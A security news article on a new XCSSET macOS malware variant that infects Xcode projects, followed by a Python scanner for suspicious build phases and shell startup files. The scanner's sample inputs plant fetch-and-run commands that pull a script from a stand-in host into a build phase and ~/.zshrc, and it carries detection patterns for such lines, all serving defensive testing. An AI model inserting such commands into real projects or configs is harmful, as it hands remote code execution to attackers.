A new variant of the modular macOS malware XCSSET was observed infecting the Xcode projects of Apple developers, creating serious supply chain risks.
Microsoft Threat Intelligence reported March 11 that the first known XCSSET variant since 2022 features enhanced obfuscation methods, updated persistence mechanisms, and new infection strategies.
“These enhanced features help this malware family steal and exfiltrate files and system and user information, such as digital wallet data and notes, among others,” wrote the researchers.
The researchers said the new variant takes a modular approach with encoded payloads, has improved error handling, and relies heavily on scripting languages, Unix commands, and legitimate binaries. Together these characteristics keep the malware's footprint on an affected device small, making detection and removal more challenging.
Jaron Bradley, director at Jamf Threat Labs, explained that if an Apple developer uses a repository infected with XCSSET, their product will become infected upon building, creating significant risks to the supply chain. The malware can also spread further to other projects on the developer's system, said Bradley.
“The creators of XCSSET demonstrate a strong understanding of the macOS,” said Bradley. “The original variants, discovered in 2020, exploited three zero-day vulnerabilities to bypass macOS security controls, all of which have since been patched. While the malware has not been updated with new exploits, it has been modified in several ways, including improvements to ensure it runs silently in the background during system startup. The malware code indicates ongoing development, with new capabilities still being added.”
Stephen Kowski, Field CTO at SlashNext Email Security, said that this sophisticated attack targets the software supply chain at its source, potentially compromising apps before they are even built. The malware's improved obfuscation techniques and multiple persistence methods make it particularly difficult to detect, he said.
“Real-time code scanning and advanced threat detection tools that can identify suspicious behaviors in development environments are essential for protecting against these types of attacks,” said Kowski. “Developers should implement multi-layered security approaches that include continuous monitoring of project files for unexpected changes and strict verification of all code sources before integration.”
Phil Stokes, threat researcher at SentinelOne, added that this new version of XCSSET also targets developers' GitHub projects and takes some novel approaches to persistence and stealth, by poisoning the user's shell config files and by impersonating and replacing native applications. Its use of AppleScript, largely executed in memory, is both characteristic of XCSSET and particularly tricky for traditional AV solutions to detect, Stokes said, since it leaves very little written to disk.
“Developers are reminded that Xcode will typically warn a user when deploying a shared project downloaded from the internet and such projects should not be trusted without careful inspection,” said Stokes. “At this time, we are not seeing the same scale of XCSSET infections as we did with the earlier version and this research is a timely reminder to both organizations and developers to be vigilant.”
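The advice above comes down to two checks a developer or security team can automate: inspect what a project's Run Script build phases would execute at build time, and watch shell startup files for lines that were not there before. The Python script below is an added example written for this article; it is not code from Microsoft, Jamf, SentinelOne or the XCSSET samples. Its indicator patterns, the sample project.pbxproj fragment, the sample .zshrc contents and the example.invalid URL are constructed assumptions for illustration, not XCSSET indicators of compromise.

```python
"""Heuristic scan of an Xcode project.pbxproj and a shell rc file.

Added example for this article, not code from Microsoft, Jamf, SentinelOne
or XCSSET. Indicator patterns and sample inputs are constructed assumptions.
"""
import base64
import re
from typing import List

# Constructs that rarely belong in a Run Script build phase or in ~/.zshrc.
# Assumed heuristics for illustration, not signatures from a vendor report.
INDICATORS = {
    "decode-then-execute": re.compile(
        r"\b(base64\s+(-d|-D|--decode)|xxd\s+-r)\b[^|\n]*\|\s*(sh|bash|zsh|osascript)\b"),
    "remote-fetch-to-shell": re.compile(
        r"\b(curl|wget)\b[^|\n]*\|\s*(sh|bash|zsh|python3?|osascript)\b"),
    "eval-of-dynamic-string": re.compile(r"\beval\s+[\"'$`(]"),
    "inline-applescript": re.compile(r"\bosascript\s+-e\b"),
    "detached-background-job": re.compile(r"\bnohup\b|&\s*disown\b"),
    "long-base64-literal": re.compile(r"[A-Za-z0-9+/]{80,}={0,2}"),
}

# project.pbxproj is an old-style plist: "<hex id> /* comment */ = { isa = ...; ...; };"
PHASE_HEADER = re.compile(
    r"(?P<id>[0-9A-Fa-f]{8,32})\s*(?:/\*[^*]*\*/)?\s*=\s*\{\s*isa\s*=\s*PBXShellScriptBuildPhase;")
NAME_FIELD = re.compile(r"\bname\s*=\s*(?:\"((?:\\.|[^\"\\])*)\"|([^;\s]+))\s*;")
SCRIPT_FIELD = re.compile(r"\bshellScript\s*=\s*\"((?:\\.|[^\"\\])*)\"\s*;", re.S)


def unescape_pbx(s: str) -> str:
    # Undo the C-style escaping (\n, \", \\) that pbxproj uses inside quoted strings.
    return re.sub(r"\\(.)", lambda m: {"n": "\n", "t": "\t"}.get(m.group(1), m.group(1)), s, flags=re.S)


def extract_run_script_phases(pbxproj: str) -> List[dict]:
    """Return every PBXShellScriptBuildPhase as {id, name, script}, script unescaped."""
    phases = []
    for m in PHASE_HEADER.finditer(pbxproj):
        rest = pbxproj[m.end():]
        close = rest.find("};")                      # end of this object's dictionary
        body = rest if close < 0 else rest[:close]
        name_m, script_m = NAME_FIELD.search(body), SCRIPT_FIELD.search(body)
        name = ""
        if name_m:
            name = name_m.group(1) if name_m.group(1) is not None else name_m.group(2)
        phases.append({"id": m.group("id"), "name": unescape_pbx(name),
                       "script": unescape_pbx(script_m.group(1)) if script_m else ""})
    return phases


def scan_text(text: str, source: str) -> List[dict]:
    """One finding per (line, indicator) hit; findings are triage leads, not verdicts."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for label, pattern in INDICATORS.items():
            if pattern.search(line):
                findings.append({"source": source, "line": lineno,
                                 "indicator": label, "text": line.strip()})
    return findings


def scan_pbxproj(pbxproj: str) -> List[dict]:
    """Scan what each Run Script phase would execute when the project is built."""
    findings = []
    for phase in extract_run_script_phases(pbxproj):
        findings += scan_text(phase["script"], f"build phase {phase['id']} ({phase['name']})")
    return findings


def scan_rc_file(current: str, baseline: str, path: str = "~/.zshrc") -> List[dict]:
    """Flag rc-file lines absent from a recorded baseline, then apply the indicators."""
    known = {l.strip() for l in baseline.splitlines()}
    findings = [{"source": path, "line": n, "indicator": "line-not-in-baseline", "text": line.strip()}
                for n, line in enumerate(current.splitlines(), 1)
                if line.strip() and line.strip() not in known]
    return findings + scan_text(current, path)


# --- Constructed sample inputs (not real project files or malware artifacts) ---
PAYLOAD_B64 = base64.b64encode(
    b"curl -fsSL http://example.invalid/stage2.sh | sh >/dev/null 2>&1 &").decode()
SAMPLE_PBXPROJ = (
    "/* Begin PBXShellScriptBuildPhase section */\n"
    "\t\t0A1B2C3D4E5F60718293A4B5 /* Run Script */ = {\n"
    "\t\t\tisa = PBXShellScriptBuildPhase;\n"
    "\t\t\tfiles = (\n\t\t\t);\n"
    "\t\t\tname = \"SwiftLint\";\n"
    "\t\t\tshellPath = /bin/sh;\n"
    "\t\t\tshellScript = \"echo \\\"Linting...\\\"\\nswiftlint --quiet\\n\";\n"
    "\t\t};\n"
    "\t\tC6D7E8F90A1B2C3D4E5F6071 /* Run Script */ = {\n"
    "\t\t\tisa = PBXShellScriptBuildPhase;\n"
    "\t\t\tfiles = (\n\t\t\t);\n"
    "\t\t\tname = \"Run Script\";\n"
    "\t\t\tshellPath = /bin/sh;\n"
    f"\t\t\tshellScript = \"echo {PAYLOAD_B64} | base64 -d | sh\\n\";\n"
    "\t\t};\n"
    "/* End PBXShellScriptBuildPhase section */\n"
)
BASELINE_ZSHRC = "export PATH=\"$HOME/bin:$PATH\"\nalias ll='ls -la'\n"
CURRENT_ZSHRC = BASELINE_ZSHRC + (
    "nohup osascript -e \"$(curl -fsSL http://example.invalid/u)\" >/dev/null 2>&1 &\n")

if __name__ == "__main__":
    for f in scan_pbxproj(SAMPLE_PBXPROJ) + scan_rc_file(CURRENT_ZSHRC, BASELINE_ZSHRC):
        print(f"{f['source']}:{f['line']} [{f['indicator']}] {f['text'][:70]}")
```

In practice you feed `scan_pbxproj` the contents of a real `project.pbxproj` (found inside the `.xcodeproj` bundle) before opening a project pulled from the internet, and run `scan_rc_file` against a baseline copy of `~/.zshrc` or `~/.bash_profile` recorded on a known-clean machine. Treat hits as triage leads: legitimate build phases do sometimes call `curl` or decode base64, so the point is to force a human look at anything a build would execute, not to produce a verdict.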
Microsoft also noted in the blog that, although it has so far observed only limited attacks using the new variant, it published the research to make security teams aware of the threat and to offer recommendations that organizations can use to protect themselves.